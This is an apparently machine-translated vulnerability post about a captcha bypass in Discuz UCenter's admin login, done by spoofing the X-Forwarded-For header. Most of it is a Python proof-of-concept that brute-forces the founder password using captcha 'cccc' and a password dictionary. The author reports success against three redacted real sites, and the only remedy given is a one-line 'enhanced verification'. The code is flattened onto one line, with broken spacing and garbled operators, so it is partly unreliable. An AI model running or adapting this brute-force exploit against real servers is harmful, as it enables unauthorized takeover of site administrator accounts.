Discuz's UCenter founder password can be cracked (in some cases)

Discuz's UCenter founder password can be cracked (in some cases)

Without looking at the source code, you can directly test it in the black box. Non-verification code recognition.
So attach several success stories using code +.

Http: // 192.168.1.105/discuz/uc_server/admin. php
 

Contains a verification code

The Verification Code address is

Http: // localhost/discuz/uc_server/admin. php? M = seccode & seccodeauth = 250 dIGq % 2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94 & 7500



However

Tested and found

When you log on to uc_server, if the ip address appears for the first time, the default value of seccode is cccc.

The IP address is obtained through X-Forwarded-.

That is, after we modify the xff ip address, open the above verification code url again. The image value is cccc.
 

Therefore, you can write a program to crack the password by modifying the value of X-Forwarded-.
 

The program has been written as follows. (Code slag, sorry .) Take the Founder's password as an example. The Administrator's password should also work.
 

<Poc> # coding: utf-8import httplib, re, random, urllib, timefrom sys import argv # crack def getHtml (host, htmlhash, htmlpass, htmlseccode): ip = str (random. randint (1,100) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv: 33.0) gecko/20100101 Firefox/33.0 "," X-Forwarded-For ": ip, 'content-Typ E ': 'application/x-www-form-urlencoded', 'accept': 'text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 ', 'connection ': 'Keep-alive'} postContent = 'sid = & formhash = '+ htmlhash +' & seccodehidden = '+ htmlseccode +' & iframe = 0 & isfounder = 1 & password = '+ htmlpass + '& seccode = cccc & submit = % E7 % 99% BB + % E5 % BD % 95' resultHtml = httplib. HTTPConnection (host, 80, False) resultHtml. request ('post', '/uc_server/admin. php? M = user & a = login ', body = postContent, headers = postHead) page = resultHtml. getresponse () pageConect = page. read () return pageConect # Get formhash and seccodehiddendef gethashs (host): url = 'HTTP: // '+ host +'/uc_server/admin. php 'pagecontent = urllib. urlopen (url ). read () r1 = re. compile ('<input type = "hidden" name = "formhash" value = "(\ S +)"/>') htmlhash = r1.findall (pageContent) [0] r2 = re. compile ('<input type = "hidden" name = "seccodehidden" value = "(\ S +)"/>') htmlseccode = r2.findall (pageContent) [0] return htmlhash + ''+ htmlseccode # obtain the host dictionary interval through argv for blasting if (len (argv) = 1 ): print '----> python' + argv [0] + 'host address dictionary file interval 'print' ----> python' + argv [0] + '192.168.1.105 pass.txt 0.2' else: host = argv [1] passfile = argv [2] sleeptime = argv [3] print 'website host is '+ host # retrieve domain name and then add some passwords hostuser = host. split ('. ') hostuser = hostuser [len (hostuser)-2] hostpass = [hostuser + '000000', hostuser + '000000', hostuser + hostuser, hostuser + '.. ', hostuser + '. ', hostuser + 'admin888', hostuser + 'admin123', hostuser + 'admin ', hostuser + '000000'] print 'the password dictionary is' + passfileprint '. The interval is' + sleeptimeprint '---> 'X = gethashs (host ). split ('') f = open (passfile, 'R') htmlpass = f. read (). split ('\ r \ n') htmlpass = hostpass + htmlpassf. close () for I in range (len (htmlpass): time. sleep (float (sleeptime) print 'attempt password' + htmlpass [I] if (getHtml (host, x [0], htmlpass [I], x [1]) = ''): print '. The password is' + htmlpass [I] break </poc>

 

Python dz_blast.py 192.168.1.117 pass.txt 0

192.168.1.117 dz built in a new Virtual Machine
 

Attached success stories

Without such a dictionary at hand, I just added a few passwords to test, which are common weak passwords.


 

1.http://**.**.**/ admin123456_2.http://**.**.**/  admin_3.http://**.**.**/  123456

 

 

 

 

 

Solution:

Enhanced verification